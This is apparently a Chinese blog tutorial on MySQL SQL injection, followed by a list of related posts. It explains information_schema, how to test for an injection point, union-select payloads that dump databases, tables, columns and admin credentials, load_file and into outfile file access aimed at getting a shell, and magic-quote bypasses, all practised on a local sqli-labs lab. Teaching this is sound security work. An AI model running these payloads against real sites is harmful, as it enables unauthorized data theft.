SQL注入之MYSQL注入

已于 2022-04-19 11:16:45 修改
阅读量7.2k 收藏 11
点赞数 7
分类专栏: 笔记 渗透测试 文章标签: sql 安全
于 2022-04-19 11:15:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/av11566/article/details/124268873
版权

前言(菜鸡教程大佬勿喷)

MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。

必要知识

  1. 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。
  2. 数据库中符号"."代表下一级,如xiaodi.user表示xiaodi数据库下的user表名。
  3. 常用参数

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

user() 查看当前MySQL登录的用户名

database() 查看当前使用MySQL数据库名

version() 查看当前MySQL版本

如何判断注入点

  1. 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞

单引号 '

and 1=1

and 1=2

SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

  1. 逻辑运算符(或与非)

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

SELECT * FROM users WHERE id=1 真

1=1 真

1=2 假

真且真=真

真且假=假

SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常

MySQL 5.x数据结构

  1. 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中具有表schemata(数据库名),table(表名),columns(列名或字段名)
  2. 在schemata表中,schema_name字段用来存储数据库名
  3. 在table表中,table_schema和table_name分别用来存储数据库名和表名
  4. 在column表中,table_schema(数据库名),table_name(表名),column_name(字段名)
  5. 关于直接对数据库的增删改查
    1. 增 create database 数据库名
    2. 删 drop database 数据库名
    3. 改 rename database 旧名 to 新名
    4. 查 show databases

    5. 创建表 create table table_name( id1 int,id2 varcher)

    6. 重新给表命名 alter table table_name_old rename as table_name_new
  1. 关于对数据表的增删改查
    1. 增    insert into table_name(列1,列2 ... ) values(值1,值2 ... )
    2. 删    delete from 表名 where 列名 = 值
    3. 改    update 表名 set 列名=新值 where 列名=某值

       
    4. 查    select * from 表名 where 字段1=‘条件一’and 字段2 =‘条件二’
    5. 扩展 limit

limit m,n 从m行开始,到m+n行结束

select * from admin limit 2,1 指的是 从第二行开始,到第三行结束(从第二行开始查取一行数据)

高权限注入及低权限注入

  1. 跨库查询及应用思路

information_schema 表特性,记录库名,表名,列名对应表

通过select * from schemata; 进行数据库名查询,再去选择进行查询获取指明数据库里的数据

获取所有数据库名:

http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1union select 1,group_concat(schema_name),3 from information_schema.schemata

获取指定qqyw数据库名下的表名信息:

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='qqyw'

获取指定qqyw下的表名admin下的列名信息:

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and  table_achema='qqyw'                 

获取指定qqyw下的admin数据

union select 1,u,p,4 from qqyw.admin

  1. 文件读写操作

会用到MySQL数据库里两个内置函数,这两个函数是MySQL数据库特有的,在其他数据库是没有的或者在其他数据库中写法不 同,所以这是为什么说注入点分数据库的原因,因为每个数据库内置的安全机制和它的功能不同,这才导致在注入的时候针对不用的数据库采取的攻击思路也不同。MySQL有内置读取的操作函数,我们可以调用这个函数作为注入的攻击。

load_file():读取函数

into outfile 或 into dumpfile:导出函数

  • outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。
  • dumpfile只能写一行,并且输出中不存在任何格式。

(将x写入www文件中)

路径获取常见方法:

报错显示:一般网站出现错误的时候它会泄露出路径

遗留文件:站长为了调试信息的时候遗留的文件而泄露的 路径。用扫描工具可以扫出

漏洞报错:知道对方是用什么程序搭建再去网上去搜索漏洞信息:phpcms 爆路径

平台配置文件:通过读取文件来读取搭建网站平台的配置文件。缺点:路径不是默认的,一旦更改很难找到路径

爆破

windows:

d:/wwwroot/xiaodi8/

linux:

/var/www/xiaodi8

扩展连接:

常见的load_file()读取的敏感信息_weixin_30292843的博客-CSDN博客

  1. 常见读取文件列表:

常见写入文件问题:魔术引号开关

magic_quotes_gpc

  1. 魔术引号及常见防护

a. 编码或宽字节绕过:

比如在sqlmap中添加--temper脚本参数转码

或者使用转换工具

b. 防护:

1.)自带防御:魔术引号

2.)内置函数:int等

3.)自定义关键字:select等

4.)WAF防护软件:安全狗、宝塔等

  1. 低版本注入配合读取或暴力

字典或读取

涉及资源:

常见的load_file()读取的敏感信息_weixin_30292843的博客-CSDN博客

sqli-labs测试(简单练习一下)

先来温习一下基本注入流程:

  1. 根据注入位置数据类型将sql注入分类
  2. 利用order判断字段数

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

?id=1' order by 3--+

  1. 利用 union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数

?id=-1 union select 1,2,3 --+

  1. 利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号

?id=-1 union select 1,database(),version() --+

  1. 利用 union select 联合查询,获取表名    

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+

  1. 利用 union select 联合查询,获取字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+

  1. 利用 union select 联合查询,获取字段值

?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+

  1. 根据注入位置数据类型将sql注入分类

可以从SQL语法错误得出我们需要的东西

'1'' LIMIT 0,1 这个引号是我们自己加的 可以知道这个就是‘1',也就是说,这是个字符串类型的sql注入

  1. 利用order by 来判断字段数

在经过一番测试之后可以发现有三个字段

  1. 利用 union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数

利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号

  1. 利用 union select 联合查询,获取表名

  1. 利用 union select 联合查询,获取字段名

  1. 利用 union select 联合查询,获取字段值

即可成功得到我们想要的用户名和密码

一块金子
关注
专栏目录
MySQL SQL 注入
小小博客爱分享
07-29 206
本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL注入的字符。 SQL注入可能是目前互联网上存在的最丰富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞。 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到
sql注入-MySQL
2202_75361164的博客
04-07 1214
盲注点确认后,我们一般不会去手动尝试一个字节一个字节的跑出来,而是采用工具比如sqlmap或者一些脚本来辅助我们,毕竟是属于重复无意义的工工作,交给机器就好了语句和之前其他查询都是类似,唯一的区别,就是盲注变成了一位字符一位字符的判断,不像之前那样一次性全部获取数据。
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1701
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
手工操作几种常见SQL注入
X1DD1Asad343的博客
06-20 1379
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
sql注入(mysql)
m0_73452266的博客
04-20 564
sql注入基础
MySQLSQL注入
weixin_33817333的博客
12-12 80
1.SQL注入? 通过SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 2.防止SQL注入,我们需要注意以下几个要点: ①永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和 双"-"进行转换等; ②永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取; ③永远不...
SQL 注入~MySQL专题
weixin_30547797的博客
12-21 141
Recently, 团队在做一个关于SQL的项目,这个专题是项目中的一部分,该部分正是由我来负责的。今天,分享给正在奋斗中的伙伴们,愿,你们在以后的学习道路中能有自己的收获。 神奇的MySQL SQl注入漏洞产生的原因 程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 未对用户可控参...
SQL注入MySQL注入
weixin_51583033的博客
12-20 867
SQL注入MySQL注入
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1358
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
MySQLSQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
PHP+MysqlSQL注入源码 下载
01-01
这个"PHP+MysqlSQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入、PHP与MySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入SQL Server注入MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
MYSQLSQL注入
mojiezhao的博客
02-18 352
如果通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据...
SQL注入实战MySQL_SQL注入实战-MySQL
weixin_35070578的博客
02-11 319
靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:这里仅列出常用的信...
Mysql注入
天天学安全专属博客
10-28 4456
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
SQL注入(MySQL)
jxy158212的博客
01-02 1196
通过把SQL语言注入到Web的表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令目的的入侵行为。该博客以mysql数据库为例,讲解不同注入类型
SQL注入Mysql注入
qq_27862405的博客
05-24 984
必要知识点: 在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。 数据库中符号“.”代表下一级,如adb.user表示adb数据库下的user表名 Information_schema.tables:记录所有表名信息的表 Information_schema.columns:记录所有列名信息的表 Information_schema.sch
针对MySQLsql注入
hibari_18的博客
03-13 730
//判断order by后面的个数 http://xxx.com/index.php?id=1 order by 3 //判断哪一个可回显 http://xxx.com/index.php?id=-1 union sel<>ect 1,2,3 //注入数据库名 http://xxx.com/index.php?id=-1 union sel<>ect 1,databas...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一块金子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值